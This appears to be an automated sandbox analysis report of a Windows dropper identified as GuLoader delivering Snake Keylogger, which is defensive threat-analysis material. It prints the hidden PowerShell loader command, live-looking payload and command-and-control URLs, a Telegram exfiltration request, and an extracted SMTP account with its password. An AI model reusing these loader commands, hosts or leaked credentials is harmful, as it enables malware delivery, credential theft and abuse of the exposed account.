Windows Analysis Report
DOC11042024.exe

Overview

General Information

Sample name: DOC11042024.exe
Analysis ID: 1548204
MD5: 2119b4c15a036b7e407a7483a89ecdbf
SHA1: 37c3c28bba3f2482e92b3b0ef570c2ba6f3167a8
SHA256: 66c79a5e56a0b28126534ded1e9dd50e2de460fb671c49e7cf7a365568c7067b

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • DOC11042024.exe (PID: 2824 cmdline: "C:\Users\user\Desktop\DOC11042024.exe" MD5: 2119B4C15A036B7E407A7483A89ECDBF)
    • powershell.exe (PID: 1372 cmdline: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author
00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: msiexec.exe PID: 1128 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: msiexec.exe PID: 1128 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

          System Summary

Source: Network Connection; Author: frack113; Data: DestinationIp: 141.98.10.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1128, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49787
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1372, TargetFilename: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", CommandLine: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC11042024.exe", ParentImage: C:\Users\user\Desktop\DOC11042024.exe, ParentProcessId: 2824, ParentProcessName: DOC11042024.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", ProcessId: 1372, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T07:13:21.664986+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49704 | TCP
2024-11-04T07:14:01.197295+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49932 | TCP
2024-11-04T07:13:42.525588+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49819 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:44.137122+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49829 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:49.154916+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49864 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:52.375517+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49887 | 188.114.96.3 | 443 | TCP
2024-11-04T07:13:40.417427+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:41.823378+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:43.417133+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49825 | 193.122.6.168 | 80 | TCP
2024-11-04T07:13:37.121948+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49787 | 141.98.10.40 | 80 | TCP

          AV Detection

Source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
Source: DOC11042024.exe Virustotal: Detection: 19%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.4% probability

          Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: DOC11042024.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49811 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49901 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2324502580.0000000002A48000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdbic source: powershell.exe, 00000002.00000002.2344628886.00000000082EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5) source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_00402706 FindFirstFileW, 0_2_00402706
Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_004061E5 FindFirstFileW, FindClose, 0_2_004061E5
Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_00405731 CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose, 0_2_00405731
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 249731E0h 5_2_24972DC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 24972C19h 5_2_24972968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 24970D0Dh 5_2_24970B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 24971697h 5_2_24970B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497CF49h 5_2_2497CCA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497D3A1h 5_2_2497D0F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497FAB9h 5_2_2497F810
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_24970853
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_24970040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 249731E0h 5_2_24972DB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497DC51h 5_2_2497D9A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 249731E0h 5_2_2497310E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497D7F9h 5_2_2497D550
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497E959h 5_2_2497E6B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497E0A9h 5_2_2497DE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497E501h 5_2_2497E258
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_24970673
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497F661h 5_2_2497F3B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497EDB1h 5_2_2497EB08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 2497F209h 5_2_2497EF60

          Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected:
    GET /xml/173.254.250.69 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /xml/173.254.250.69 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected:
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.6.168
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49825 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49804 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49787 -> 141.98.10.40:80
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49887 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49864 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49829 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49819 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49932
Source: global traffic HTTP traffic detected:
    GET /nMcrGmhC252.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: vyebetsh.sa.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: vyebetsh.sa.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Mon, 04 Nov 2024 06:13:54 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: DOC11042024.exe, DOC11042024.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: msiexec.exe, 00000005.00000003.2697286494.000000000620D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.000000000620D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3281075405.0000000021170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vyebetsh.sa.com/nMcrGmhC252.bin
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DD2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021DC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69$
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBjq
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49901 version: TLS 1.2
          Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe
          Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\DOC11042024.exe | File created: C:\Windows\resources\0809
          Source: DOC11042024.exe | Static PE information: invalid certificate
          Source: DOC11042024.exe, 00000000.00000000.2019207241.000000000046D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename homomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exe | Binary or memory string: OriginalFilename homomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exe.2.dr | Binary or memory string: OriginalFilename homomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/15@4/4
          Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
          Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_0040206A CoCreateInstance
          Source: C:\Users\user\Desktop\DOC11042024.exe | File created: C:\Users\user\AppData\Roaming\turkeyism
          Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
          Source: C:\Users\user\Desktop\DOC11042024.exe | File created: C:\Users\user\AppData\Local\Temp\nspE74F.tmp
          Source: DOC11042024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\DOC11042024.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\DOC11042024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021EC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: DOC11042024.exe | Virustotal: Detection: 19%
          Source: C:\Users\user\Desktop\DOC11042024.exe | File read: C:\Users\user\Desktop\DOC11042024.exe
          Source: unknown | Process created: C:\Users\user\Desktop\DOC11042024.exe "C:\Users\user\Desktop\DOC11042024.exe"
          Source: C:\Users\user\Desktop\DOC11042024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\DOC11042024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\DOC11042024.exe | File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\bestialitet.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
